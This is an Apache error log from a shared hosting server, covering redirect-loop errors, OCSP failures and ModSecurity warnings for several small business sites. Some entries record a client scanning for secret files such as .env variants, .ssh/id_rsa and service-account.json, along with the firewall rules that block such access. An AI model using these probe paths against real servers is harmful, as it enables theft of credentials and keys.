[Mon May 11 19:14:32.625910 2026] [core:error] [pid 1501831:tid 1501854] [client 52.172.142.96:6333] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:32.625949 2026] [core:error] [pid 1501831:tid 1501854] [client 52.172.142.96:6333] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:33.013348 2026] [core:error] [pid 1501883:tid 1501887] [client 52.172.142.96:9561] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:33.013381 2026] [core:error] [pid 1501883:tid 1501887] [client 52.172.142.96:9561] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:33.411470 2026] [core:error] [pid 1502013:tid 1502045] [client 52.172.142.96:9538] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:33.411510 2026] [core:error] [pid 1502013:tid 1502045] [client 52.172.142.96:9538] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:33.851581 2026] [core:error] [pid 1511173:tid 1511191] [client 52.172.142.96:10001] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:33.851615 2026] [core:error] [pid 1511173:tid 1511191] [client 52.172.142.96:10001] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:34.268037 2026] [core:error] [pid 1501883:tid 1501892] [client 52.172.142.96:6335] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:34.268192 2026] [core:error] [pid 1501883:tid 1501892] [client 52.172.142.96:6335] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:34.661560 2026] [core:error] [pid 1424905:tid 1424920] [client 52.172.142.96:9990] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:34.661595 2026] [core:error] [pid 1424905:tid 1424920] [client 52.172.142.96:9990] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:35.094275 2026] [core:error] [pid 1511173:tid 1511198] [client 52.172.142.96:9998] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:35.094299 2026] [core:error] [pid 1511173:tid 1511198] [client 52.172.142.96:9998] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:35.486521 2026] [core:error] [pid 1501883:tid 1501889] [client 52.172.142.96:9996] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:35.486553 2026] [core:error] [pid 1501883:tid 1501889] [client 52.172.142.96:9996] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:35.880138 2026] [core:error] [pid 1502013:tid 1502059] [client 52.172.142.96:6300] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:35.880186 2026] [core:error] [pid 1502013:tid 1502059] [client 52.172.142.96:6300] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:36.271723 2026] [core:error] [pid 1424905:tid 1424909] [client 52.172.142.96:6293] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:36.271756 2026] [core:error] [pid 1424905:tid 1424909] [client 52.172.142.96:6293] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:36.665584 2026] [core:error] [pid 1501831:tid 1501855] [client 52.172.142.96:6156] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:36.665628 2026] [core:error] [pid 1501831:tid 1501855] [client 52.172.142.96:6156] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:37.103449 2026] [core:error] [pid 1502013:tid 1502039] [client 52.172.142.96:6317] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:37.103474 2026] [core:error] [pid 1502013:tid 1502039] [client 52.172.142.96:6317] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:37.499834 2026] [core:error] [pid 1501831:tid 1501847] [client 52.172.142.96:10016] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:37.499870 2026] [core:error] [pid 1501831:tid 1501847] [client 52.172.142.96:10016] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:37.899058 2026] [core:error] [pid 1511173:tid 1511197] [client 52.172.142.96:13483] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:37.899091 2026] [core:error] [pid 1511173:tid 1511197] [client 52.172.142.96:13483] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:38.321406 2026] [core:error] [pid 1501883:tid 1501886] [client 52.172.142.96:10022] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:38.321435 2026] [core:error] [pid 1501883:tid 1501886] [client 52.172.142.96:10022] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:38.707665 2026] [core:error] [pid 1424905:tid 1424925] [client 52.172.142.96:13449] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:38.707699 2026] [core:error] [pid 1424905:tid 1424925] [client 52.172.142.96:13449] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:39.097149 2026] [core:error] [pid 1501831:tid 1501833] [client 52.172.142.96:6276] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:39.097203 2026] [core:error] [pid 1501831:tid 1501833] [client 52.172.142.96:6276] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:39.492131 2026] [core:error] [pid 1501883:tid 1501893] [client 52.172.142.96:10025] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:39.492173 2026] [core:error] [pid 1501883:tid 1501893] [client 52.172.142.96:10025] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:39.876579 2026] [core:error] [pid 1502013:tid 1502044] [client 52.172.142.96:13460] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:39.876609 2026] [core:error] [pid 1502013:tid 1502044] [client 52.172.142.96:13460] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:40.266772 2026] [core:error] [pid 1424905:tid 1424919] [client 52.172.142.96:10045] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:40.266809 2026] [core:error] [pid 1424905:tid 1424919] [client 52.172.142.96:10045] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:40.668530 2026] [core:error] [pid 1501831:tid 1501850] [client 52.172.142.96:9987] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:40.668660 2026] [core:error] [pid 1501831:tid 1501850] [client 52.172.142.96:9987] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:41.088866 2026] [core:error] [pid 1501883:tid 1501897] [client 52.172.142.96:6314] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:41.088898 2026] [core:error] [pid 1501883:tid 1501897] [client 52.172.142.96:6314] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:41.512012 2026] [core:error] [pid 1502013:tid 1502049] [client 52.172.142.96:13462] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:41.512045 2026] [core:error] [pid 1502013:tid 1502049] [client 52.172.142.96:13462] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:41.907997 2026] [core:error] [pid 1501831:tid 1501846] [client 52.172.142.96:13442] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:41.908035 2026] [core:error] [pid 1501831:tid 1501846] [client 52.172.142.96:13442] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:42.295855 2026] [core:error] [pid 1511173:tid 1511184] [client 52.172.142.96:13741] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:14:42.295889 2026] [core:error] [pid 1511173:tid 1511184] [client 52.172.142.96:13741] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 19:15:03.222092 2026] [proxy_http:error] [pid 1501883:tid 1501903] (20014)Internal error (specific information not available): [client 5.255.124.170:38950] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 19:15:03.222254 2026] [proxy:error] [pid 1501883:tid 1501903] [client 5.255.124.170:38950] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/.env.test
[Mon May 11 19:15:03.222989 2026] [proxy_http:error] [pid 1511173:tid 1511180] (20014)Internal error (specific information not available): [client 5.255.124.170:38970] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 19:15:03.223008 2026] [proxy:error] [pid 1511173:tid 1511180] [client 5.255.124.170:38970] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/backend/.env
[Mon May 11 19:15:03.225274 2026] [proxy_http:error] [pid 1501831:tid 1501845] (20014)Internal error (specific information not available): [client 5.255.124.170:38990] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 19:15:03.225401 2026] [proxy_http:error] [pid 1424905:tid 1424923] (20014)Internal error (specific information not available): [client 5.255.124.170:38900] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 19:15:03.225299 2026] [proxy:error] [pid 1501831:tid 1501845] [client 5.255.124.170:38990] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/.ssh/id_rsa
[Mon May 11 19:15:03.225420 2026] [proxy:error] [pid 1424905:tid 1424923] [client 5.255.124.170:38900] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/.env.example
[Mon May 11 19:15:03.229032 2026] [proxy_http:error] [pid 1502013:tid 1502047] (20014)Internal error (specific information not available): [client 5.255.124.170:39048] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 19:15:03.229054 2026] [proxy:error] [pid 1502013:tid 1502047] [client 5.255.124.170:39048] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/service-account.json
[Mon May 11 19:15:03.231121 2026] [proxy_http:error] [pid 1501883:tid 1501899] (20014)Internal error (specific information not available): [client 5.255.124.170:38978] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 19:15:03.231145 2026] [proxy:error] [pid 1501883:tid 1501899] [client 5.255.124.170:38978] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/app/.env
[Mon May 11 19:15:03.234298 2026] [proxy_http:error] [pid 1511173:tid 1511182] (20014)Internal error (specific information not available): [client 5.255.124.170:38946] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 19:15:03.234343 2026] [proxy:error] [pid 1511173:tid 1511182] [client 5.255.124.170:38946] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/.env.staging
[Mon May 11 19:15:03.238604 2026] [proxy_http:error] [pid 1424905:tid 1424914] (20014)Internal error (specific information not available): [client 5.255.124.170:38966] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 19:15:03.238632 2026] [proxy:error] [pid 1424905:tid 1424914] [client 5.255.124.170:38966] AH00898: Error reading from remote server returned by /___proxy_subdomain_webmail/admin/.env
[Mon May 11 19:15:05.302798 2026] [proxy_http:error] [pid 1511173:tid 1511180] (20014)Internal error (specific information not available): [client 5.255.124.170:38970] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 19:15:05.310759 2026] [proxy_http:error] [pid 1501883:tid 1501898] (20014)Internal error (specific information not available): [client 5.255.124.170:38918] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 19:15:05.311681 2026] [proxy_http:error] [pid 1511173:tid 1511179] (20014)Internal error (specific information not available): [client 5.255.124.170:39012] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 19:15:05.313966 2026] [proxy_http:error] [pid 1424905:tid 1424932] (20014)Internal error (specific information not available): [client 5.255.124.170:40068] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 19:15:05.322213 2026] [proxy_http:error] [pid 1502013:tid 1502040] (20014)Internal error (specific information not available): [client 5.255.124.170:39906] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 19:15:05.323482 2026] [proxy_http:error] [pid 1424905:tid 1424914] (20014)Internal error (specific information not available): [client 5.255.124.170:38966] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 19:15:05.330793 2026] [proxy_http:error] [pid 1501831:tid 1501846] (20014)Internal error (specific information not available): [client 5.255.124.170:38986] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 19:15:05.330846 2026] [proxy_http:error] [pid 1502013:tid 1502041] (20014)Internal error (specific information not available): [client 5.255.124.170:38930] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 19:15:05.338659 2026] [proxy_http:error] [pid 1501831:tid 1501836] (20014)Internal error (specific information not available): [client 5.255.124.170:38962] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 19:15:05.894902 2026] [proxy_http:error] [pid 1502013:tid 1502047] (20014)Internal error (specific information not available): [client 5.255.124.170:39048] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 19:15:05.898293 2026] [proxy_http:error] [pid 1511173:tid 1511182] (20014)Internal error (specific information not available): [client 5.255.124.170:38946] AH01102: error reading status line from remote server 127.0.0.1:2095
[Mon May 11 19:16:05.193867 2026] [security2:error] [pid 1511173:tid 1511176] [client 43.166.134.114:39632] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "tct-telecom.fr"] [uri "/wp-content/uploads/2023/04/cropped-Logo_TCT-PRO_fond-blanc-32x32.webp"] [unique_id "agIO1fjVc-A-CSptvm1QGgAAAEA"]
[Mon May 11 19:16:47.239610 2026] [ssl:error] [pid 1511173:tid 1511193] (EAI 2)Name or service not known: [client 192.178.6.7:41000] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 19:16:47.240599 2026] [ssl:error] [pid 1511173:tid 1511193] AH01941: stapling_renew_response: responder error
[Mon May 11 19:16:47.601543 2026] [ssl:error] [pid 1501883:tid 1501889] (EAI 2)Name or service not known: [client 192.178.6.8:60281] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 19:16:47.601603 2026] [ssl:error] [pid 1501883:tid 1501889] AH01941: stapling_renew_response: responder error
[Mon May 11 19:16:48.137121 2026] [ssl:error] [pid 1511173:tid 1511192] (EAI 2)Name or service not known: [client 192.178.6.7:60799] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 19:16:48.137177 2026] [ssl:error] [pid 1511173:tid 1511192] AH01941: stapling_renew_response: responder error
[Mon May 11 19:16:48.690636 2026] [ssl:error] [pid 1424905:tid 1424920] (EAI 2)Name or service not known: [client 192.178.6.8:61698] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 19:16:48.690677 2026] [ssl:error] [pid 1424905:tid 1424920] AH01941: stapling_renew_response: responder error
[Mon May 11 19:16:51.165374 2026] [ssl:error] [pid 1424905:tid 1424924] (EAI 2)Name or service not known: [client 192.178.6.8:53289] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 19:16:51.165410 2026] [ssl:error] [pid 1424905:tid 1424924] AH01941: stapling_renew_response: responder error
[Mon May 11 19:16:51.681884 2026] [ssl:error] [pid 1511173:tid 1511187] (EAI 2)Name or service not known: [client 192.178.6.8:53081] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 19:16:51.681916 2026] [ssl:error] [pid 1511173:tid 1511187] AH01941: stapling_renew_response: responder error
[Mon May 11 19:16:52.252608 2026] [ssl:error] [pid 1424905:tid 1424913] (EAI 2)Name or service not known: [client 192.178.6.7:48145] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 19:16:52.252651 2026] [ssl:error] [pid 1424905:tid 1424913] AH01941: stapling_renew_response: responder error
[Mon May 11 19:16:52.841418 2026] [ssl:error] [pid 1502013:tid 1502039] (EAI 2)Name or service not known: [client 192.178.6.8:40026] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 19:16:52.841463 2026] [ssl:error] [pid 1502013:tid 1502039] AH01941: stapling_renew_response: responder error
[Mon May 11 19:17:05.055683 2026] [ssl:error] [pid 1501831:tid 1501852] (EAI 2)Name or service not known: [client 192.178.6.7:51475] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 19:17:05.055726 2026] [ssl:error] [pid 1501831:tid 1501852] AH01941: stapling_renew_response: responder error
[Mon May 11 19:17:05.808410 2026] [ssl:error] [pid 1511173:tid 1511198] (EAI 2)Name or service not known: [client 192.178.6.8:57374] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 19:17:05.808447 2026] [ssl:error] [pid 1511173:tid 1511198] AH01941: stapling_renew_response: responder error
[Mon May 11 19:18:09.320139 2026] [authz_core:error] [pid 1511173:tid 1511198] [client 47.128.126.10:49150] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/Requests/src/error_log
[Mon May 11 19:18:10.686020 2026] [security2:error] [pid 1424905:tid 1424931] [client 43.128.87.4:60448] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/nos-realisations/"] [unique_id "agIPUoW8yzYoWG_eyCXSOwAAAVc"]
[Mon May 11 19:18:15.076901 2026] [security2:error] [pid 1511173:tid 1511176] [client 43.130.14.245:46510] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "naturedetres.fr"] [uri "/"] [unique_id "agIPV_jVc-A-CSptvm1ROQAAAEA"]
[Mon May 11 19:19:04.396586 2026] [security2:error] [pid 1502013:tid 1502044] [client 176.65.139.168:39972] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.local"] [unique_id "agIPiJYn-x0CHsbEbP2KMAAAAJE"]
[Mon May 11 19:19:04.396934 2026] [security2:error] [pid 1502013:tid 1502044] [client 176.65.139.168:39972] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.local"] [unique_id "agIPiJYn-x0CHsbEbP2KMAAAAJE"]
[Mon May 11 19:19:04.397353 2026] [security2:error] [pid 1502013:tid 1502044] [client 176.65.139.168:39972] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.local"] [unique_id "agIPiJYn-x0CHsbEbP2KMAAAAJE"]
[Mon May 11 19:19:13.421265 2026] [security2:error] [pid 1511173:tid 1511196] [client 216.73.216.110:32482] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/learning/file/flash/1425464283/assets/Thumbs.db"] [unique_id "agIPkfjVc-A-CSptvm1RigAAAFQ"]
[Mon May 11 19:19:13.421681 2026] [security2:error] [pid 1511173:tid 1511196] [client 216.73.216.110:32482] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/learning/file/flash/1425464283/assets/Thumbs.db"] [unique_id "agIPkfjVc-A-CSptvm1RigAAAFQ"]
[Mon May 11 19:19:13.512479 2026] [security2:error] [pid 1511173:tid 1511196] [client 216.73.216.110:32482] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIPkfjVc-A-CSptvm1RigAAAFQ"]
